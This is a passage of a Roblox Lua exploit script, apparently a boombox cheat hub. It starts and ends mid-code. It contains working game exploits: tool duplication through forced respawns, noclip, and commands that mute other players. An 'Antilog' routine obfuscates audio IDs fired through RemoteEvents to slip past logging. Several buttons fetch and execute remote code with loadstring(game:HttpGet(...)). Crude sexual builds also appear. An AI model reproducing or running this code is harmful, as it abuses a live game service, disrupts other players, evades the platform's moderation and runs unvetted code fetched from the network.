char=game:GetService("Players").LocalPlayer.Character game:GetService("Players").LocalPlayer.Character=nil game:GetService("Players").LocalPlayer.Character=char char.Animate:Destroy() char.HumanoidRootPart.CFrame=CFrame.new(0,9999,0) wait(.1) char.HumanoidRootPart.Anchored=true for i,v in pairs(char:GetChildren()) do if v:IsA("Tool") then v.Parent=game:GetService("Players").LocalPlayer.Backpack end end wait(game:GetService("Players").RespawnTime-0.3) local t = {} for i,v in pairs(game:GetService("Players").LocalPlayer.Backpack:GetChildren()) do v.Parent=char v.Parent=workspace t[i]=v end char.Humanoid:Destroy() game:GetService("Players").LocalPlayer.Character=nil game:GetService("Players").LocalPlayer.CharacterAdded:Wait() char=game:GetService("Players").LocalPlayer.Character char:WaitForChild("Humanoid") wait(.1) for i,v in pairs(t) do char.Humanoid:EquipTool(v) end wait(.3) end end) end coroutine.wrap(ODDE_fake_script)() local function ENPZMSQ_fake_script() -- target.LocalScript local script = Instance.new('LocalScript', target) _G.target = game:GetService("Players").LocalPlayer.Name local Players = game:GetService("Players") local function get_player(name) name = name:lower() for _, player in pairs(game:GetService("Players"):GetPlayers()) do if name == player.Name:lower():sub(1, #name) then return player.Name end if name == player.DisplayName:lower():sub(1, #name) then return player.Name end end return _G.target end script.Parent.FocusLost:Connect(function() _G.target = get_player(script.Parent.Text) end) end coroutine.wrap(ENPZMSQ_fake_script)() local function AUIZTCA_fake_script() -- massplay.LocalScript local script = Instance.new('LocalScript', massplay) script.Parent.MouseButton1Click:Connect(function() local Backpack=game:GetService("Players").LocalPlayer.Backpack local lp=game:GetService("Players").LocalPlayer local tosync=false local tt=0 for i,v in pairs(Backpack:GetChildren()) do if v:IsA("Tool") then tt=tt+1 end end local t = {} for i,v in pairs(Backpack:GetChildren()) do if v:IsA("Tool") then coroutine.wrap(function() if v.Handle:FindFirstChildOfClass("Sound") then v.Handle:FindFirstChildOfClass("Sound"):Destroy() end v.Parent=lp.Character v:FindFirstChildOfClass("RemoteEvent"):FireServer("PlaySong",(script.Parent.Parent.AudioId.Text:gsub("%D+", ""))) repeat wait() until v.Handle:FindFirstChildOfClass("Sound") repeat wait() until v.Handle:FindFirstChildOfClass("Sound").IsPlaying v.Handle:FindFirstChildOfClass("Sound").Playing=false table.insert(t,v) end)() end end repeat game:service'RunService'.Heartbeat:Wait() until #t==tt wait(1) for i,v in pairs(t) do coroutine.wrap(function() v.Handle:FindFirstChildOfClass("Sound").TimePosition=0 v.Handle:FindFirstChildOfClass("Sound").Playing=true end)() end print("done") end) end coroutine.wrap(AUIZTCA_fake_script)() local function KURRZL_fake_script() -- WaveInt.LocalScript local script = Instance.new('LocalScript', WaveInt) _G[script.Parent.Name]=3 script.Parent.Changed:Connect(function(t) if t=="Text" then _G[script.Parent.Name]=tonumber(script.Parent.Text) or 0 end end) end coroutine.wrap(KURRZL_fake_script)() local function BKDEW_fake_script() -- Frame2.LocalScript local script = Instance.new('LocalScript', Frame2) _G.VisAngle="X" _G.WavesOn="Off" _G.WavesAngle="Y" _G.BoomboxDependantSpeed="Off" end coroutine.wrap(BKDEW_fake_script)() local function ZERIAJ_fake_script() -- Speed.LocalScript local script = Instance.new('LocalScript', Speed) _G[script.Parent.Name]= -5 script.Parent.Changed:Connect(function(t) if t=="Text" then _G[script.Parent.Name]=tonumber(script.Parent.Text) or 0 end end) end coroutine.wrap(ZERIAJ_fake_script)() local function LPNUOS_fake_script() -- TextBox.LocalScript local script = Instance.new('LocalScript', TextBox) _G.c=false game:service'RunService'.Heartbeat:Connect(function() local h=game:GetService("Players").LocalPlayer.Character:FindFirstChild("Humanoid") if _G.grabtools==true and h then for i,v in pairs(game:GetService("Workspace"):GetChildren()) do coroutine.wrap(function() if v:IsA("Tool") then h:EquipTool(v) end end)() end end end) spawn(function() while wait() do if _G.grabtools==true then script.Parent.TextColor3=Color3.fromRGB(37, 41, 74) script.Parent.BackgroundColor3=Color3.fromRGB(127, 142, 255) else script.Parent.TextColor3=Color3.fromRGB(255,255,255) script.Parent.BackgroundColor3=Color3.fromRGB(37, 41, 74) end end end) script.Parent.MouseButton1Click:Connect(function() _G.grabtools=not _G.grabtools end) end coroutine.wrap(LPNUOS_fake_script)() local function CULG_fake_script() -- Main.Dragify local script = Instance.new('LocalScript', Main) local UIS = game:GetService("UserInputService") function dragify(Frame) dragToggle = nil local dragSpeed = 0.50 dragInput = nil dragStart = nil local dragPos = nil function updateInput(input) local Delta = input.Position - dragStart local Position = UDim2.new(startPos.X.Scale, startPos.X.Offset + Delta.X, startPos.Y.Scale, startPos.Y.Offset + Delta.Y) game:GetService("TweenService"):Create(Frame, TweenInfo.new(0.30), {Position = Position}):Play() end Frame.InputBegan:Connect(function(input) if (input.UserInputType == Enum.UserInputType.MouseButton1 or input.UserInputType == Enum.UserInputType.Touch) and UIS:GetFocusedTextBox() == nil then dragToggle = true dragStart = input.Position startPos = Frame.Position input.Changed:Connect(function() if input.UserInputState == Enum.UserInputState.End then dragToggle = false end end) end end) Frame.InputChanged:Connect(function(input) if input.UserInputType == Enum.UserInputType.MouseMovement or input.UserInputType == Enum.UserInputType.Touch then dragInput = input end end) game:GetService("UserInputService").InputChanged:Connect(function(input) if input == dragInput and dragToggle then updateInput(input) end end) end dragify(script.Parent) end coroutine.wrap(CULG_fake_script)() function mesh() char = game:GetService("Players").LocalPlayer.Character for i, v in next, char:GetDescendants() do if v:IsA("SpecialMesh") then if v.Parent.Parent:IsA("Tool") then v:remove() end end end end function equip() Player = game:GetService("Players").LocalPlayer local Arm if Player.Character:FindFirstChild("RightHand") then Arm = Player.Character["RightHand"] else Arm = Player.Character["Right Arm"] end for i, v in next, Player.Backpack:GetChildren() do if v:IsA("Tool") then v.Parent = Player.Character for _, x in pairs(Arm:GetChildren()) do if x.Name == "RightGrip" then local amt = _ local num = 0 for _ = 1, amt do wait() num = num + 1 x.Name = "Grip_" .. num end end end end end end CmdBar.FocusLost:connect(function() if string.sub(CmdBar.Text, 1, 6) == "demesh" then mesh() end if string.sub(CmdBar.Text, 1, 5) == "mute " then for i, v in pairs(plr(string.sub(CmdBar.Text, 6))) do for _, l in next, v.Character:GetDescendants() do if l:IsA("Sound") then l:stop() l.Volume = 0 end end end end if string.sub(CmdBar.Text, 1, 4) == "mute" then for i, v in next, game:GetDescendants() do if v:IsA("Sound") and not v:IsDescendantOf(Player.Character) then v:stop() v.Volume = 0 end end end if string.sub(CmdBar.Text, 1, 8) == "loopmute" then CmdBar.Text = "" _G.mute = true while _G.mute do wait(.05) for i, v in next, game:GetDescendants() do if v:IsA("Sound") and not v:IsDescendantOf(Player.Character) then v:stop() v.Volume = 0 end end end end if string.sub(CmdBar.Text, 1, 10) == "unloopmute" then _G.mute = false end if string.sub(CmdBar.Text, 1, 6) == "noclip" then noclip = true game:GetService("RunService").Stepped:connect(function() if noclip then Char.Humanoid:ChangeState(11) end end) Notify("Noclip Enabled") end if string.sub(CmdBar.Text, 1, 4) == "clip" then noclip = false Notify("Noclip Disabled") end if string.sub(CmdBar.Text, 1,8) == "lowhold" then if plr.Character:FindFirstChild("Animate").Disabled == true then return end plr.Character.Humanoid:UnequipTools() plr.Character:FindFirstChild("Animate"):FindFirstChild("toolnone"):FindFirstChild("ToolNoneAnim").AnimationId = "nil" plr.Character.Humanoid:UnequipTools() for _,t in pairs(plr.Backpack:GetChildren()) do if t:IsA("Tool") and t:FindFirstChild("Handle") and t:FindFirstChild("Handle"):FindFirstChild("Sound") then t.GripForward = Vector3.new(-0, -1, 0) t.GripPos = Vector3.new(0.02, 0.71, 0) t.GripRight = Vector3.new(0, 0, 1) t.GripUp = Vector3.new(1, -0, 0) t.Handle.Massless = true t.Parent = plr.Character end end end if string.sub(CmdBar.Text, 1, 6) == "rejoin" then game:GetService("TeleportService"):Teleport(game.PlaceId, game:GetService("Players").LocalPlayer) Notify("Rejoining the game...") end end) WorkspaceL.MouseButton1Down:connect(function() local wspace = game:GetService("Workspace"):GetDescendants() for i, v in pairs(LogFrame.AudioLogs:GetDescendants()) do if not v:IsA("UIListLayout") then v:remove() end end for i = 1, #wspace do local v = wspace[i] if v:IsA("Sound") then if v.IsLoaded ~= false and not table.find(Ignore, v.SoundId) then local Holder = LogFrame.Holder:clone() local Frame = Holder.AudioFrame inf, info = pcall(function() return game:GetService("MarketplaceService"):GetProductInfo(v.SoundId:gsub("rbxassetid://", "", 1):gsub("http://www.roblox.com/asset/%?id=", "", 1):gsub("https://www.roblox.com/asset/%?id=", "", 1)) end) if inf then Frame.AudioName.Text = info.Name elseif v.SoundId:match("^rbxassetid://sounds/") then Frame.AudioName.Text = v.SoundId:gsub("rbxasset://sounds/", "", 1) else Frame.AudioName.Text = v.Name end Holder.Visible = true Holder.Name = v.SoundId Frame.AudioID.Text = v.SoundId:gsub("http://www.roblox.com/asset/%?id=", "", 1) Tween(LogFrame.AudioLogs, .2, "Quad", "Out", { CanvasSize = UDim2.new(0, 0, 0, LogFrame.AudioLogs.UIListLayout.AbsoluteContentSize.Y * 1.5) }) Holder.Parent = LogFrame.AudioLogs Frame.Select.MouseButton1Down:connect(function() active = nil active = v.SoundId end) end end end end) GameL.MouseButton1Down:connect(function() local wspace = game:GetDescendants() for i, v in pairs(LogFrame.AudioLogs:GetDescendants()) do if not v:IsA("UIListLayout") then v:remove() end end for i = 1, #wspace do local v = wspace[i] if v:IsA("Sound") then if v.IsLoaded ~= false and not table.find(Ignore, v.SoundId) then local Holder = LogFrame.Holder:clone() local Frame = Holder.AudioFrame inf, info = pcall(function() return game:GetService("MarketplaceService"):GetProductInfo(v.SoundId:gsub("rbxassetid://", "", 1):gsub("http://www.roblox.com/asset/%?id=", "", 1):gsub("https://www.roblox.com/asset/%?id=", "", 1)) end) if inf then Frame.AudioName.Text = info.Name elseif v.SoundId:match("^rbxassetid://sounds/") then Frame.AudioName.Text = v.SoundId:gsub("rbxasset://sounds/", "", 1) else Frame.AudioName.Text = v.Name end Holder.Visible = true Holder.Name = v.SoundId Frame.AudioID.Text = v.SoundId:gsub("http://www.roblox.com/asset/%?id=", "", 1) Tween(LogFrame.AudioLogs, .2, "Quad", "Out", { CanvasSize = UDim2.new(0, 0, 0, LogFrame.AudioLogs.UIListLayout.AbsoluteContentSize.Y * 1.5) }) Holder.Parent = LogFrame.AudioLogs Frame.Select.MouseButton1Down:connect(function() active = nil active = v.SoundId end) end end end end) Play.MouseButton1Down:connect(function() if not LogPlay then LogPlay = true local Sound = Instance.new("Sound") Sound.Parent = Main Sound.Looped = true Sound.SoundId = active Sound.Volume = 2 Sound:play() Play.Text = "Stop" else local Sound = Main.Sound Sound:remove() LogPlay = false Play.Text = "Play Audio" end end) Copy.MouseButton1Down:connect(function() everyClipboard(active) Notify("ID copied in Clipboard") end) function Format(Int) return string.format("%02i", Int) end function getVersion(id) return tonumber(string.match(game:HttpGetAsync("http://www.roblox.com/studio/plugins/info?assetId=" .. tostring(tonumber(id))), "value=\"(%d+)\"")) end function confuzzle(text) if type(text) == "number" then text = string.format("0x%X", text) end return (string.gsub(text, ".", function(symbol) return string.format(({"%%%x", "%%%X"})[math.random(2)], string.byte(string[({"upper", "lower"})[math.random(2)]](symbol))) end)) end function genId(ToConvert) local function E(id, bool) return tostring(("&" .. confuzzle("assetversionid") .. (bool and "=\n\r" or "\n\r=") .. confuzzle(id) or "")) end local IdStorage = {E(getVersion(ToConvert), true), E(359218057), E(363537554), E(307950810), E(307918992)} local function X() return tostring(table.remove(IdStorage, math.random(#IdStorage, #IdStorage))) end local RetId = string.rep("\n=ƒ=ƒ=ƒ=ƒ=ƒ=ƒ\n" .. X() .. "\n=ƒ=ƒ=ƒ=ƒ=ƒ=ƒ\n" .. X() .. "\n=ƒ=ƒ=ƒ=ƒ=ƒ=ƒ\n", 4) while #IdStorage > 0 do RetId = RetId .. X() end return tostring(RetId) end Antilog.FocusLost:connect(function(Enter) if Enter then equip() wait() local Bait = confuzzle("142376088") local ID = genId(Antilog.Text) ID = string.gsub(ID, "%X%x", function(symbol) return symbol .. string.rep(" ", 2) end) Bait = string.gsub(Bait, "%x%x", function(symbol) return symbol .. string.rep(" ", 2) end) h = "&\n?\n \n " .. confuzzle(Bait) .. "\n \n \n " .. Player.Name .. " <- cool kid\n \n \n \n?" ID = "0\n?\n \n\n\n\n [ 。・:*:・゚★,。・:*:・゚☆。 LUCIOUSWARE 。・:*:・゚★,。・:*:・゚☆ ]" .. ID .. h for i, v in next, Player.Character:GetDescendants() do if v:IsA("RemoteEvent") then v:FireServer("PlaySong", ID) end end end wait(1) Antilog.Text = "" end) end }) Main:AddButton({ Title = "FE Space Hub", Description = "for boomboxes", Callback = function() loadstring(game:HttpGet('https://raw.githubusercontent.com/yofriendfromschool1/Sky-Hub-Backup/main/FE/SpaceHub.lua'))() end }) Main:AddButton({ Title = "FE Salmon Hub", Description = "for boomboxes SalmonHub Made by Salmon#3917", Callback = function() --SalmonHub Made by Salmon#3917 local Library = loadstring(game:HttpGet("https://raw.githubusercontent.com/yofriendfromschool1/Sky-Hub-Backup/main/KavoLib/Kavolibupdate.txt"))() local Window = Library.CreateLib("Salmon's partially skidded dollhouse gui") wait(1.2) game.StarterGui:SetCore("SendNotification", { Title = "Script loaded"; Text = "Made by Salmon#3917"; Duration = 5; }) --_______________________________________________________________________________________________ local Tab = Window:NewTab("Boombox Duper") local Section = Tab:NewSection("Boombox duper") Section:NewTextBox("in void dupe", "", function(xd) local amount = xd local plr = game:GetService("Players").LocalPlayer local character = plr.Character local ogpos = character.HumanoidRootPart.Position for i = 1, amount do character:WaitForChild("HumanoidRootPart") for i,v in pairs(plr.Backpack:GetChildren()) do if v:IsA("Tool") then v.Parent = character end end for i,v in pairs(character:GetChildren()) do if v:IsA("Tool") then v.Parent = character end end character.HumanoidRootPart.CFrame = CFrame.new(0,9999999999,0) repeat wait() until not plr.Backpack:FindFirstChildOfClass("Tool") wait(0.75) for i,v in pairs(character:GetChildren()) do if v:IsA("BasePart") then v.CanCollide = false v.Anchored = true end end for i,v in pairs(character:GetChildren()) do if v:IsA("Tool") then v.Parent = workspace end end character:BreakJoints() plr.CharacterAdded:Wait() character = plr.Character end character:WaitForChild('HumanoidRootPart') wait(0.15) character.HumanoidRootPart.CFrame = CFrame.new(ogpos) for i,v in pairs(game:GetService("Workspace"):GetChildren()) do if v:IsA("Tool") then character.Humanoid:EquipTool(v) end end end) Section:NewTextBox("In house dupe", "", function(ff) local amount = ff local plr = game:GetService("Players").LocalPlayer local character = plr.Character local ogpos = character.HumanoidRootPart.Position for i = 1, amount do character:WaitForChild("HumanoidRootPart") for i,v in pairs(plr.Backpack:GetChildren()) do if v:IsA("Tool") then v.Parent = character end end for i,v in pairs(character:GetChildren()) do if v:IsA("Tool") then v.Parent = character end end character.HumanoidRootPart.CFrame = CFrame.new(5614.46484375, 52.155479431152344, -17237.150390625) repeat wait() until not plr.Backpack:FindFirstChildOfClass("Tool") wait(0.25) for i,v in pairs(character:GetChildren()) do if v:IsA("BasePart") then v.CanCollide = false v.Anchored = true end end for i,v in pairs(character:GetChildren()) do if v:IsA("Tool") then v.Parent = workspace end end character:BreakJoints() plr.CharacterAdded:Wait() character = plr.Character end character:WaitForChild('HumanoidRootPart') wait(0.15) character.HumanoidRootPart.CFrame = CFrame.new(ogpos) for i,v in pairs(game:GetService("Workspace"):GetChildren()) do if v:IsA("Tool") then character.Humanoid:EquipTool(v) end end end) --_______________________________________________________________________________________________ local Tab = Window:NewTab("Visuals") local Section = Tab:NewSection("BoomBox Visuals") -- shitty color selector that somehow works Section:NewColorPicker("Color Selector", "changes colors", Color3.fromRGB(0,0,0), function(color) local plr = game:GetService("Players").LocalPlayer; plr.Character.Humanoid:UnequipTools() for i, v in pairs(game:GetService("Players").LocalPlayer.Backpack:GetChildren()) do if v:IsA("Tool") and v.Name == "BoomBox" then v.Handle.Color = color v.Parent = game:GetService("Players").LocalPlayer.Character end end end) -- FORCEFIELD BOOMBOX Section:NewButton("Forcefield BoomBox", "", function() local plr = game:GetService("Players").LocalPlayer; plr.Character.Humanoid:UnequipTools() for i, v in pairs(game:GetService("Players").LocalPlayer.Backpack:GetChildren()) do if v:IsA("Tool") and v.Name == "BoomBox" then v.Handle.Material = "ForceField" end end end) Section:NewButton("Delete Mesh", "", function() local plr = game:GetService("Players").LocalPlayer for _, x in pairs(plr.Backpack:GetChildren()) do if x.Name == "BoomBox" then if x.Handle:FindFirstChild("Mesh") then x.Parent = plr.Character x.Handle.Mesh:Destroy() end end end end) local Section = Tab:NewSection("Map Visuals") Section:NewButton("Low GFX", "", function() local Material = "SmoothPlastic" for i,v in next, game:GetService("Workspace"):GetDescendants() do if v:IsA("BasePart") then v.Material = Material end end end) -- taco, dont ask why its here. -- 142376088 --_______________________________________________________________________________________________ local Tab = Window:NewTab("Boombox builds") local Section = Tab:NewSection("Boombox builds (not skidded)") Section:NewButton("Hidden Boombox (1)", "", function() local plr = game:GetService("Players").LocalPlayer; plr.Character.Humanoid:UnequipTools() local Tools = plr.Backpack:GetChildren() Tools[1].Grip = CFrame.new(-1.5, 0, -8) * CFrame.Angles(0, math.rad(180), 0) Tools[1].Parent = plr.Character local hum = game:GetService("Players").LocalPlayer.Character.Humanoid for _,x in next, hum:GetPlayingAnimationTracks() do if x.Animation then x:Stop() end end end) Section:NewButton("Boombox Back (1-10)", "", function() local plr = game:GetService("Players").LocalPlayer; plr.Character.Humanoid:UnequipTools() local Tools = plr.Backpack:GetChildren() Tools[1].Grip = CFrame.new(-1, 1, 2.3) * CFrame.Angles(0, math.rad(180), 0.65) Tools[1].Parent = plr.Character Tools[2].Grip = CFrame.new(-1, 1, 2.3) * CFrame.Angles(0, math.rad(180), 0.65) Tools[2].Parent = plr.Character Tools[3].Grip = CFrame.new(-1, 1, 2.3) * CFrame.Angles(0, math.rad(180), 0.65) Tools[3].Parent = plr.Character Tools[4].Grip = CFrame.new(-1, 1, 2.3) * CFrame.Angles(0, math.rad(180), 0.65) Tools[4].Parent = plr.Character Tools[5].Grip = CFrame.new(-1, 1, 2.3) * CFrame.Angles(0, math.rad(180), 0.65) Tools[5].Parent = plr.Character Tools[6].Grip = CFrame.new(-1, 1, 2.3) * CFrame.Angles(0, math.rad(180), 0.65) Tools[6].Parent = plr.Character Tools[7].Grip = CFrame.new(-1, 1, 2.3) * CFrame.Angles(0, math.rad(180), 0.65) Tools[7].Parent = plr.Character Tools[8].Grip = CFrame.new(-1, 1, 2.3) * CFrame.Angles(0, math.rad(180), 0.65) Tools[8].Parent = plr.Character Tools[9].Grip = CFrame.new(-1, 1, 2.3) * CFrame.Angles(0, math.rad(180), 0.65) Tools[9].Parent = plr.Character Tools[10].Grip = CFrame.new(-1, 1, 2.3) * CFrame.Angles(0, math.rad(180), 0.65) Tools[10].Parent = plr.Character end) --_______________________________________________________________________________________________ Section:NewButton("Penis (3)", "", function() local plr = game:GetService("Players").LocalPlayer; plr.Character.Humanoid:UnequipTools() local Tools = plr.Backpack:GetChildren() Tools[1].Grip = CFrame.new(-1, 0.3, -1.3) * CFrame.Angles(1.6, math.rad(0), 3.16) Tools[1].Parent = plr.Character Tools[2].Grip = CFrame.new(-2, 0.3, -1.3) * CFrame.Angles(1.6, math.rad(0), 3.16) Tools[2].Parent = plr.Character Tools[3].Grip = CFrame.new(1.5, -1.5, -1.3) * CFrame.Angles(1.6, math.rad(90), 3.16) Tools[3].Parent = plr.Character end) --_______________________________________________________________________________________________ Section:NewButton("Big Penis (4)", "", function() local plr = game:GetService("Players").LocalPlayer; plr.Character.Humanoid:UnequipTools() local Tools = plr.Backpack:GetChildren() Tools[1].Grip = CFrame.new(-1, 0.3, -1.3) * CFrame.Angles(1.6, math.rad(0), 3.16) Tools[1].Parent = plr.Character Tools[2].Grip = CFrame.new(-2, 0.3, -1.3) * CFrame.Angles(1.6, math.rad(0), 3.16) Tools[2].Parent = plr.Character Tools[3].Grip = CFrame.new(1.5, -1.5, -1.3) * CFrame.Angles(1.6, math.rad(90), 3.16) Tools[3].Parent = plr.Character Tools[4].Grip = CFrame.new(4, -1.5, -1.3) * CFrame.Angles(1.6, math.rad(90), 3.16) Tools[4].Parent = plr.Character end) --_______________________________________________________________________________________________ Section:NewButton("HUGE PENIS (why did i make this)(10)", "", function() local plr = game:GetService("Players").LocalPlayer; plr.Character.Humanoid:UnequipTools() local Tools = plr.Backpack:GetChildren() Tools[1].Grip = CFrame.new(-1, 0.3, -1.3) * CFrame.Angles(1.6, math.rad(0), 3.16) Tools[1].Parent = plr.Character Tools[2].Grip = CFrame.new(-2, 0.3, -1.3) * CFrame.Angles(1.6, math.rad(0), 3.16) Tools[2].Parent = plr.Character Tools[3].Grip = CFrame.new(1.5, -1.5, -1.3) * CFrame.Angles(1.6, math.rad(90), 3.16) Tools[3].Parent = plr.Character Tools[4].Grip = CFrame.new(4, -1.5, -1.3) * CFrame.Angles(1.6, math.rad(90), 3.16) Tools[4].Parent = plr.Character Tools[5].Grip = CFrame.new(6.5, -1.5, -1.3) * CFrame.Angles(1.6, math.rad(90), 3.16) Tools[5].Parent = plr.Character Tools[6].Grip = CFrame.new(9, -1.5, -1.3) * CFrame.Angles(1.6, math.rad(90), 3.16) Tools[6].Parent = plr.Character Tools[7].Grip = CFrame.new(11.5, -1.5, -1.3) * CFrame.Angles(1.6, math.rad(90), 3.16) Tools[7].Parent = plr.Character Tools[8].Grip = CFrame.new(14, -1.5, -1.3) * CFrame.Angles(1.6, math.rad(90), 3.16) Tools[8].Parent = plr.Character Tools[9].Grip = CFrame.new(16.5, -1.5, -1.3) * CFrame.Angles(1.6, math.rad(90), 3.16) Tools[9].Parent = plr.Character Tools[10].Grip = CFrame.new(16.5, -1.5, -1.3) * CFrame.Angles(1.6, math.rad(90), 3.16) Tools[10].Parent = plr.Character end) --_______________________________________________________________________________________________ Section:NewButton("Schizo Cage (33)", "", function() local plr = game:GetService("Players").LocalPlayer; plr.Character.Humanoid:UnequipTools() local Tools = plr.Backpack:GetChildren() Tools[1].Grip = CFrame.new(0, 1.2, 0) * CFrame.Angles(0, math.rad(0), 0) Tools[1].Parent = plr.Character Tools[2].Grip = CFrame.new(0, 2.6, 0) * CFrame.Angles(0, math.rad(0), 0) Tools[2].Parent = plr.Character Tools[3].Grip = CFrame.new(0, -0.2, 0) * CFrame.Angles(0, math.rad(0), 0) Tools[3].Parent = plr.Character Tools[4].Grip = CFrame.new(-1.6, -1.6, -0.6) * CFrame.Angles(0, math.rad(-45), 0) Tools[4].Parent = plr.Character Tools[5].Grip = CFrame.new(0, -3, 0) * CFrame.Angles(0, math.rad(0), 0) Tools[5].Parent = plr.Character Tools[6].Grip = CFrame.new(2.6, 1.2, 0) * CFrame.Angles(0, math.rad(0), 0) Tools[6].Parent = plr.Character Tools[7].Grip = CFrame.new(2.6, 2.6, 0) * CFrame.Angles(0, math.rad(0), 0) Tools[7].Parent = plr.Character Tools[8].Grip = CFrame.new(2.6, -0.2, 0) * CFrame.Angles(0, math.rad(0), 0) Tools[8].Parent = plr.Character Tools[9].Grip = CFrame.new(3.6, -1.6, -2.6) * CFrame.Angles(0, math.rad(45), 0) Tools[9].Parent = plr.Character Tools[10].Grip = CFrame.new(2.6, -3, 0) * CFrame.Angles(0, math.rad(0), 0) Tools[10].Parent = plr.Character Tools[11].Grip = CFrame.new(0, 1.2, 3) * CFrame.Angles(0, math.rad(180), 0) Tools[11].Parent = plr.Character Tools[12].Grip = CFrame.new(0, 2.6, 3) * CFrame.Angles(0, math.rad(180), 0) Tools[12].Parent = plr.Character Tools[13].Grip = CFrame.new(0, -0.2, 3) * CFrame.Angles(0, math.rad(180), 0) Tools[13].Parent = plr.Character Tools[14].Grip = CFrame.new(0, -1.6, 3) * CFrame.Angles(0, math.rad(180), 0) Tools[14].Parent = plr.Character Tools[15].Grip = CFrame.new(0, -3, 3) * CFrame.Angles(0, math.rad(180), 0) Tools[15].Parent = plr.Character Tools[16].Grip = CFrame.new(-2.6, 1.2, 3) * CFrame.Angles(0, math.rad(180), 0) Tools[16].Parent = plr.Character Tools[17].Grip = CFrame.new(-2.6, 2.6, 3) * CFrame.Angles(0, math.rad(180), 0) Tools[17].Parent = plr.Character Tools[18].Grip = CFrame.new(-2.6, -0.2, 3) * CFrame.Angles(0, math.rad(180), 0) Tools[18].Parent = plr.Character Tools[19].Grip = CFrame.new(-2.6, -1.6, 3) * CFrame.Angles(0, math.rad(180), 0) Tools[19].Parent = plr.Character Tools[20].Grip = CFrame.new(-2.6, -3, 3) * CFrame.Angles(0, math.rad(180), 0) Tools[20].Parent = plr.Character Tools[21].Grip = CFrame.new(-1.5, -3, 1.2) * CFrame.Angles(0, math.rad(90), 0) Tools[21].Parent = plr.Character Tools[22].Grip = CFrame.new(-1.5, 1.2, 1.2) * CFrame.Angles(0, math.rad(90), 0) Tools[22].Parent = plr.Character Tools[23].Grip = CFrame.new(-1.5, 2.6, 1.2) * CFrame.Angles(0, math.rad(90), 0) Tools[23].Parent = plr.Character Tools[24].Grip = CFrame.new(-1.5, -0.2, 1.2) * CFrame.Angles(0, math.rad(90), 0) Tools[24].Parent = plr.Character Tools[25].Grip = CFrame.new(-1.5, -1.6, 1.2) * CFrame.Angles(0, math.rad(90), 0) Tools[25].Parent = plr.Character Tools[26].Grip = CFrame.new(1.5, -3, 3.8) * CFrame.Angles(0, math.rad(-90), 0) Tools[26].Parent = plr.Character Tools[27].Grip = CFrame.new(1.5, -1.6, 3.8) * CFrame.Angles(0, math.rad(-90), 0) Tools[27].Parent = plr.Character Tools[28].Grip = CFrame.new(1.5, -0.2, 3.8) * CFrame.Angles(0, math.rad(-90), 0) Tools[28].Parent = plr.Character Tools[29].Grip = CFrame.new(1.5, 1.2, 3.8) * CFrame.Angles(0, math.rad(-90), 0) Tools[29].Parent = plr.Character Tools[30].Grip = CFrame.new(1.5, 2.6, 3.8) * CFrame.Angles(0, math.rad(-90), 0) Tools[30].Parent = plr.Character Tools[31].Grip = CFrame.new(-1.5, 0.1, 3.4) * CFrame.Angles(4.71, math.rad(90), 0) Tools[31].Parent = plr.Character Tools[32].Grip = CFrame.new(-1.5, -1.4, 3.4) * CFrame.Angles(4.71, math.rad(90), 0) Tools[32].Parent = plr.Character Tools[33].Grip = CFrame.new(-1.5, -2.9, 3.4) * CFrame.Angles(4.71, math.rad(90), 0) Tools[33].Parent = plr.Character end) --_______________________________________________________________________________________________ Section:NewButton("Really bad headphones (5)", "", function() local plr = game:GetService("Players").LocalPlayer; plr.Character.Humanoid:UnequipTools() local Tools = plr.Backpack:GetChildren() Tools[1].Grip = CFrame.new(-1.5, -1.3, -2.4) * CFrame.Angles(0, math.rad(90), 0) Tools[1].Parent = plr.Character Tools[2].Grip = CFrame.new(1.5, -1.3, 2.5) * CFrame.Angles(0, math.rad(-90), 0) Tools[2].Parent = plr.Character Tools[3].Grip = CFrame.new(-1.5, -1.3, -0.5) * CFrame.Angles(0, math.rad(90), 0) Tools[3].Parent = plr.Character Tools[4].Grip = CFrame.new(1.5, -1.3, 0.6) * CFrame.Angles(0, math.rad(-90), 0) Tools[4].Parent = plr.Character Tools[5].Grip = CFrame.new(1.5, -1.8, -1.6) * CFrame.Angles(0, math.rad(0), 0) Tools[5].Parent = plr.Character end) --_______________________________________________________________________________________________ Section:NewButton("QBZ 95 (45)", "", function() local plr = game:GetService("Players").LocalPlayer; plr.Character.Humanoid:UnequipTools() local Tools = plr.Backpack:GetChildren() Tools[1].Grip = CFrame.new(0, -1.3, 0) * CFrame.Angles(0, math.rad(-90), 0) Tools[1].Parent = plr.Character Tools[2].Grip = CFrame.new(0.4, 0, 0) * CFrame.Angles(-1.58, math.rad(160), -1.5) Tools[2].Parent = plr.Character Tools[3].Grip = CFrame.new(2.6, -1.3, 0) * CFrame.Angles(0, math.rad(-90), 0) Tools[3].Parent = plr.Character Tools[4].Grip = CFrame.new(5.4, -1.3, 0) * CFrame.Angles(0, math.rad(-90), 0) Tools[4].Parent = plr.Character Tools[5].Grip = CFrame.new(-1, 2, 0) * CFrame.Angles(-1.58, math.rad(160), -1.5) Tools[5].Parent = plr.Character Tools[6].Grip = CFrame.new(-3.6, 2, 0) * CFrame.Angles(-1.58, math.rad(160), -1.5) Tools[6].Parent = plr.Character Tools[7].Grip = CFrame.new(-2.7, -1.3, 0) * CFrame.Angles(0, math.rad(-90), 0) Tools[7].Parent = plr.Character Tools[8].Grip = CFrame.new(-5.4, -1.3, 0) * CFrame.Angles(0, math.rad(-90), 0) Tools[8].Parent = plr.Character Tools[9].Grip = CFrame.new(0.2, -2, 0) * CFrame.Angles(-1.58, math.rad(160), -1.5) Tools[9].Parent = plr.Character Tools[10].Grip = CFrame.new(-5.4, -2.6, 0) * CFrame.Angles(0, math.rad(-90), 0) Tools[10].Parent = plr.Character Tools[11].Grip = CFrame.new(-2.7, -2.6, 0) * CFrame.Angles(0, math.rad(-90), 0) Tools[11].Parent = plr.Character Tools[12].Grip = CFrame.new(2.6, -2.6, 0) * CFrame.Angles(0, math.rad(-90), 0) Tools[12].Parent = plr.Character Tools[13].Grip = CFrame.new(-0, -2.6, 0) * CFrame.Angles(0, math.rad(-90), 0) Tools[13].Parent = plr.Character Tools[14].Grip = CFrame.new(5.4, -2.6, 0) * CFrame.Angles(0, math.rad(-90), 0) Tools[14].Parent = plr.Character Tools[15].Grip = CFrame.new(0.4, 7, 0) * CFrame.Angles(-1.58, math.rad(190), -1.5) Tools[15].Parent = plr.Character Tools[16].Grip = CFrame.new(-1.7, 7, 0) * CFrame.Angles(-1.58, math.rad(195), -1.5) Tools[16].Parent = plr.Character Tools[17].Grip = CFrame.new(0.5, 8.3, 0) * CFrame.Angles(-1.58, math.rad(190), -1.5) Tools[17].Parent = plr.Character Tools[18].Grip = CFrame.new(-1.5, 